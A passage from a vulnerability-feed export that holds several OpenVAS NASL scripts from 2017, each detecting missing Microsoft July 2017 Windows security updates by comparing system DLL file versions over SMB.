accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML\n input containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, gain the same\n user rights as the current user, run arbitrary code in the context of 
another\n user, trick a user by redirecting the user to a specially crafted website, run\n processes in an elevated context, retrieve the base address of the kernel driver from\n a compromised process, embed an ActiveX control marked 'safe for initialization'\n in an application or Microsoft Office document that hosts the Internet Explorer\n rendering engine, force the browser to send data that would otherwise be\n restricted to a destination web site of their choice, bypass Extended Protection\n for Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025339\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1477\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 
'Vulnerable range: 11.0.14393.0 - 11.0.14393.1478\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025344", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811456", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025344)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025344)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811456\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8595\", \"CVE-2017-8598\", \"CVE-2017-8599\", \"CVE-2017-8601\",\n \"CVE-2017-8602\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\", \"CVE-2017-8607\",\n \"CVE-2017-8608\", \"CVE-2017-8467\", \"CVE-2017-8486\", \"CVE-2017-8495\",\n \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\", \"CVE-2017-8619\",\n \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\", \"CVE-2017-8562\",\n \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99403, 99417, 99393, 99420, 99390, 99406, 99407, 99389, 99388,\n 99408, 99410, 99412, 99409, 99414, 99424, 99418, 99391, 99399,\n 99392, 99439, 99398, 99426, 99397, 99402, 99428, 99394, 99431,\n 99416, 99419, 99421, 99423, 99429, 99432, 99413, 99400, 99425,\n 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:57:23 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025344)\");\n\n script_tag(name:\"summary\", 
value:\"This host is missing a critical security\n update according to Microsoft KB4025344\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability could gain the same user rights as\n the current user, could run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system, leading to cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025344\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1006\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.1006\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:24:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8607", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", 
"CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025338", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811461", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811461", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025338)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025338)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811461\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8595\", \"CVE-2017-8599\", \"CVE-2017-8601\", \"CVE-2017-8602\",\n \"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8605\", \"CVE-2017-8606\",\n \"CVE-2017-8607\", \"CVE-2017-8608\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\", \"CVE-2017-8619\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8585\", \"CVE-2017-8587\",\n \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99403, 99393, 99420, 99390, 99389, 99388, 99408, 99410, 99412,\n 99409, 99414, 99418, 99391, 99399, 99392, 99424, 99439, 99398,\n 99426, 99397, 99402, 99428, 99394, 99431, 99416, 99419, 99421,\n 99423, 99429, 99432, 99413, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 08:32:30 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025338)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025338\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Windows when Win32k fails to properly handle objects in memory.\n\n - The way that the Scripting Engine renders when handling objects in memory\n in Microsoft browsers.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way Microsoft Edge handles objects in memory.\n\n - When Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - when an affected Microsoft browser does not properly parse HTTP content.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - When Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as\n the default authentication protocol.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - The Microsoft Graphics Component fails to properly handle\n objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to gain the same user rights as\n the current user, run arbitrary code, processes with elevated privileges.\n Also could take control of the affected system and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 for x86/x64-based Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025338\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17488\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17488\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025331", "modified": "2020-06-04T00:00:00", "published": 
"2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811517", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811517", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811517\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0170\", \"CVE-2017-8463\", \"CVE-2017-8606\", \"CVE-2017-8467\",\n \"CVE-2017-8486\", \"CVE-2017-8607\", \"CVE-2017-8608\", \"CVE-2017-8495\",\n \"CVE-2017-8556\", \"CVE-2017-8618\", \"CVE-2017-8557\", \"CVE-2017-8561\",\n \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\", \"CVE-2017-8565\",\n \"CVE-2017-8573\", \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\",\n \"CVE-2017-8581\", \"CVE-2017-8582\", \"CVE-2017-8587\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\", \"CVE-2017-8592\");\n script_bugtraq_id(99389, 
99408, 99409, 99414, 99410, 99412, 99424, 99439, 99399,\n 99398, 99426, 99397, 99402, 99428, 99394, 99431, 99416, 99419,\n 99421, 99423, 99429, 99413, 99400, 99425, 99427, 99396);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:01:25 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4025331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025331\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in Microsoft Windows which fails to properly handle objects in\n memory.\n\n - An error in the way JavaScript engines render when handling objects in memory\n in Microsoft browsers.\n\n - An error in Windows Explorer which improperly handles executable files and\n shares during rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address, allowing an\n attacker to retrieve information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft 
Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary\n code in the context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated context,\n retrieve the base address of the kernel driver from a compromised process,\n embed an ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"10.0.9200.22207\"))\n{\n report = 'File checked: ' + sysPath + \"\\mshtml.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 10.0.9200.22207\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:50:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025336", "modified": "2019-12-20T00:00:00", 
"published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811518", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025336)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025336)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811518\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8594\", \"CVE-2017-8602\", \"CVE-2017-0170\", \"CVE-2017-8463\",\n \"CVE-2017-8606\", \"CVE-2017-8607\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8495\", \"CVE-2017-8608\", \"CVE-2017-8618\", \"CVE-2017-8556\",\n \"CVE-2017-8557\", \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\",\n \"CVE-2017-8564\", \"CVE-2017-8565\", \"CVE-2017-8573\", \"CVE-2017-8577\",\n \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\", \"CVE-2017-8582\",\n \"CVE-2017-8587\", \"CVE-2017-8588\", \"CVE-2017-8589\", \"CVE-2017-8590\",\n 
\"CVE-2017-8592\");\n script_bugtraq_id(99397, 99396, 99412, 99394, 99414, 99416, 99390, 99419, 99399,\n 99398, 99439, 99410, 99431, 99402, 99401, 99400, 99389, 99409,\n 99408, 99429, 99428, 99421, 99423, 99425, 99424, 99427, 99426,\n 99413);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 10:05:45 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025336)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025336\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - When Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel\n Address Space Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers 
improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses\n XML input containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML\n input containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to obtain information to further compromise the user's system,\n gain the same user rights as the current user, run arbitrary code in the\n context of another user, trick a user by redirecting the user\n to a specially crafted website, run processes in an elevated context, retrieve the\n base address of the kernel driver from a compromised process, embed an\n ActiveX control marked 'safe for initialization' in an application or\n Microsoft Office document that hosts the Internet Explorer rendering engine,\n force the browser to send data that would otherwise be restricted to a\n destination web site of their choice, bypass Extended Protection for\n Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025336\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18737\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, 